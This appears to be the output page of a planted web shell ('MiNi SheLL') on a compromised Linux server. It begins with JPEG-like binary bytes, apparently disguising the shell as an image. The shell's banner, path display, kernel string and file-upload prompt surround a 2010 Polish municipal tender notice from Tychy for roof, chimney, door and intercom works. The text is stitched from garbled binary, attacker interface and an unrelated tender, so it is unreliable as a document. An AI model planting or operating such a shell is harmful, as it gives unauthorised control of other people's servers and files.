JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100713/206468-N-2010.html

<p class="kh_header"><b>Tychy: Wymiana obróbek blacharskich dachu, oraz remont kominów i wymiana drzwi
   	wejściowych łącznie z instalacją domofonową w budynku Wspólnoty
  	Mieszkaniowej ARKADIA położonym w Tychach, przy ul. Generała Andersa 11-11c</b><br>
<b>Numer ogłoszenia: 206468 - 2010; data zamieszczenia: 13.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana obróbek blacharskich dachu, oraz remont kominów i wymiana drzwi
   	wejściowych łącznie z instalacją domofonową w budynku Wspólnoty
  	Mieszkaniowej ARKADIA położonym w Tychach, przy ul. Generała Andersa 11-11c.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem  zamówienia są roboty budowlane w zakresie: 
- wymiany obróbek blacharskich dachu, rynien wraz z montażem dodatkowych 3 sztuk rur
   	spustowych; 
-  remontu kominów (przemurowanie, tynkowanie, wymiana czap betonowych);
- 	wymiany drewnianej stolarki drzwiowej - 4szt. (drzwi wejściowe od strony podwórka);
-  wymiany istniejącej instalacji domofonowej na cyfrową;
w budynku Wspólnoty Mieszkaniowej ARKADIA położonym w Tychach, przy                     
ul. Generała Andersa 11-11c, administrowanym przez Rejon Obsługi Mieszkańców Nr I, 
z podziałem na 4 części zwane dalej zadaniami, tj.:   
           
          ZADANIE Nr 1 -	Wymiana obróbek blacharskich dachu, rynien wraz z montażem
  	dodatkowych rur spustowych w budynku mieszkalnym - wielorodzinnym
                                  	Wspólnoty Mieszkaniowej ARKADIA w Tychach, przy 
                 	ul. Generała Andersa 11-11c
  	ZADANIE Nr 2 -	Remont kominów w budynku mieszkalnym - wielorodzinnym Wspólnoty
                                   	Mieszkaniowej ARKADIA w Tychach, przy ul. Generała Andersa 11-11c
         ZADANIE Nr 3 -	Wymiana stolarki drzwiowej zewnętrznej klatek schodowych w budynku
    	mieszkalnym - wielorodzinnym Wspólnoty Mieszkaniowej ARKADIA 
                               	w Tychach, przy ul. Generała Andersa 11-11c
         ZADANIE Nr 4 -	Wymiana instalacji domofonowej w budynku mieszkalnym -  
 	wielorodzinnym Wspólnoty Mieszkaniowej ARKADIA w Tychach, przy 
   	ul. Generała Andersa 11-11c

2.	Zakres robót obejmuje m.in.:
- dla Zadania Nr 1:
     wymianę obróbek blacharskich dachu:
          - wymiana pokrycia murów ogniowych,
          - wymiana pokryć dachowych i obróbek,
          - naprawa pokrycia dachowego z blachy,
          - wymiana rynien z blachy,
          - rozebranie rur spustowych,
          - montaż rur spustowych,
          - wywóz złomu z terenu rozbiórki,

- dla Zadania Nr 2:
       	remont kominów:
	- roboty rozbiórkowe,
	- przemurowanie kominów z cegły,
  	- przewody kominowe - odgruzowanie,
  	- izolacje poziome murów,
 	- wykonanie tynków zwykłych,
- wywóz i utylizacja gruzu,

- dla Zadania Nr 3:
	wymianę drewnianej stolarki drzwiowej:
	- wykucie z muru ościeżnic drewnianych,
	- montaż drzwi zewnętrznych wejściowych z PCV,
	- malowanie farbami emulsyjnymi starych tynków,
	- wywóz i utylizacja gruzu,

- dla Zadania Nr 4:
	wymianę istniejącej instalacji domofonowej na cyfrową:
- wymiana aparatu odbiorczego,
- wymiana tablicy przyzywowej,
- wymiana przewodów kabelkowych,
- wkładki systemowe w drzwiach.


3.	Szczegółowy zakres w/w robót określają przedmiary robót na poszczególne zadania.
4.	Przedmiot zamówienia obejmuje wykonanie wszelkich prac i czynności niezbędnych                  do prawidłowego zrealizowania niniejszego zamówienia w zakresie rzeczowo - ilościowym określonym w z załączonych przedmiarach robót i specyfikacji technicznego wykonania 
i odbioru robót.
5.	Przedmiary robót oraz specyfikacja technicznego wykonania i odbioru robót, stanowią załączniki do niniejszej specyfikacji.
6.	Zamawiający dopuszcza zastosowanie materiałów innych (tzw. równoważnych) o parametrach        i właściwościach nie gorszych niż wskazane w przedmiarach robót.
7.	Wykonawca, który posłuży się materiałami równoważnymi jest obowiązany wykazać, że spełniają one wymagania określone przez Zamawiającego w przedmiarach robót.
8.	Wykonawcy winni dokonać wizji lokalnej nieruchomości, przy ul. Andersa 11-11c..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.13.20-3, 45.26.19.10-6, 45.26.25.22-6, 45.41.00.00-4, 45.42.11.31-1, 45.31.43.10-7, 45.31.40.00-1, 45.11.12.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku udziału w postępowaniu dotyczącego posiadania wiedzy i doświadczenia Zamawiający wymaga, aby Wykonawca wykazał, że w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością:
     dla Zadania Nr 1 - co najmniej jedną robotę, o charakterze podobnym do przedmiotu
     zamówienia tj. obejmującą swym zakresem roboty dekarsko - blacharskie o wartości tej
     roboty nie mniejszej niż 45 000,00 zł (brutto),
     dla Zadania Nr 2 - co najmniej jedną robotę, o charakterze podobnym do przedmiotu
     zamówienia tj. obejmującą swym zakresem roboty murarsko - tynkarskie o wartości tej roboty 
     nie mniejszej niż 25 000,00 zł (brutto),
     dla Zadania Nr 3 - co najmniej jedną robotę, o charakterze podobnym do przedmiotu
     zamówienia tj. obejmującą swym zakresem wymianę stolarki drzwiowej o wartości tej
     roboty nie mniejszej niż 15 000,00 zł (brutto),
     dla Zadania Nr 4 - nie dotyczy

(W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać  łącznie lub co najmniej jeden z Wykonawców).  

Ocena spełnienia  warunków udziału w postępowaniu będzie dokonywana wg sposobu spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku udziału w postępowaniu dotyczącego dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia  Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje osobami zdolnymi do wykonania zamówienia, w szczególności co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności konstrukcyjno budowlanej (kierownik robót) (dot. Zadania Nr 1÷3). 

(W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać   łącznie lub co najmniej jeden z Wykonawców).       
   Ocena spełnienia  warunków udziału w postępowaniu będzie dokonywana wg sposobu spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej 
 i finansowej Zamawiający wymaga, aby
 Wykonawca wykazał, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
 prowadzonej działalności związanej z przedmiotem zamówienia - o wartości ubezpieczenia nie
 mniejszej niż:


     	dla Zadania Nr 1÷3 - 15 000,00 zł
       

Oznaczenie sprawy:  DTE - 340 / 92,93,94,95 / 07 / 2010

dla Zadania Nr 4 - nie dotyczy
(W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać  łącznie lub co najmniej jeden z Wykonawców).  
   Ocena spełnienia  warunków udziału w postępowaniu będzie dokonywana wg sposobu spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy (na wybrane zadanie / zadania) 2) Pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa 3) podpisane oświadczenie o zapoznaniu się z treścią projektu umowy (na wybrane zadanie / zadania)  4) Kosztorys ofertowy (na wybrane zadanie / zadania) do którego należy załączyć zestawienie zbiorcze materiałów 5) Protokół danych wyjściowych do kosztorysowania (na wybrane zadanie / zadania) 6) Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku - PZP.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>8.	Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku 
do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1)	zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT,
2)	wydłużenia terminu zakończenia robót wyłącznie w sytuacji udokumentowanego  wystąpienia
niesprzyjających warunków atmosferycznych uniemożliwiających wykonywanie robót  zgodnie 
z technologią i sztuką budowlaną, pod warunkiem terminowego - zgodnego z umową terminu rozpoczęcia robót (dot. Zadania Nr 1 i 2),
3)	wydłużenia terminu zakończenia robót w przypadku wystąpienia robót dodatkowych 
nie objętych zamówieniem podstawowym, których wykonanie stało się konieczne na skutek
sytuacji niemożliwej wcześniej do przewidzenia,  jeżeli:
    a)	z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego 
od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich  kosztów  lub
	b)	wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia
  		dodatkowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego - pokój Nr 20 - cena 15,00 zł (brutto) lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2010 godzina 11:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE Nr 1 -	Wymiana obróbek blacharskich dachu, rynien wraz z montażem
  	dodatkowych rur spustowych w budynku mieszkalnym - wielorodzinnym
                                  	Wspólnoty Mieszkaniowej ARKADIA w Tychach, przy 
                 	ul. Generała Andersa 11-11c.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in.:
     wymianę obróbek blacharskich dachu:
          - wymiana pokrycia murów ogniowych,
          - wymiana pokryć dachowych i obróbek,
          - naprawa pokrycia dachowego z blachy,
          - wymiana rynien z blachy,
          - rozebranie rur spustowych,
          - montaż rur spustowych,
          - wywóz złomu z terenu rozbiórki,
Szczegółowy zakres w/w robót określa przedmiar robót, który stanowi Załącznik do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.13.20-3, 45.26.19.10-6, 45.11.12.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE Nr 2 -	Remont kominów w budynku mieszkalnym - wielorodzinnym Wspólnoty
                                   	Mieszkaniowej ARKADIA w Tychach, przy ul. Generała Andersa 11-11c.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in.:
remont kominów:
	- roboty rozbiórkowe,
	- przemurowanie kominów z cegły,
  	- przewody kominowe - odgruzowanie,
  	- izolacje poziome murów,
 	- wykonanie tynków zwykłych,
- wywóz i utylizacja gruzu,
Szczegółowy zakres w/w robót określa przedmiar robót, który stanowi Załącznik do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.19.10-6, 45.26.25.22-6, 45.41.00.00-4, 45.11.12.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE Nr 3 -	Wymiana stolarki drzwiowej zewnętrznej klatek schodowych w budynku
    	mieszkalnym - wielorodzinnym Wspólnoty Mieszkaniowej ARKADIA 
                               	w Tychach, przy ul. Generała Andersa 11-11c.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in.:
wymianę drewnianej stolarki drzwiowej:
	- wykucie z muru ościeżnic drewnianych,
	- montaż drzwi zewnętrznych wejściowych z PCV,
	- malowanie farbami emulsyjnymi starych tynków,
	- wywóz i utylizacja gruzu,
Szczegółowy zakres w/w robót określa przedmiar robót, który stanowi Załącznik do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.11.31-1, 45.11.12.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE Nr 4 -	Wymiana instalacji domofonowej w budynku mieszkalnym -  
 	wielorodzinnym Wspólnoty Mieszkaniowej ARKADIA w Tychach, przy 
   	ul. Generała Andersa 11-11c.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in.:
wymianę istniejącej instalacji domofonowej na cyfrową:
- wymiana aparatu odbiorczego,
- wymiana tablicy przyzywowej,
- wymiana przewodów kabelkowych,
- wkładki systemowe w drzwiach.
Szczegółowy zakres w/w robót określa przedmiar robót, który stanowi Załącznik do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.43.10-7, 45.31.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com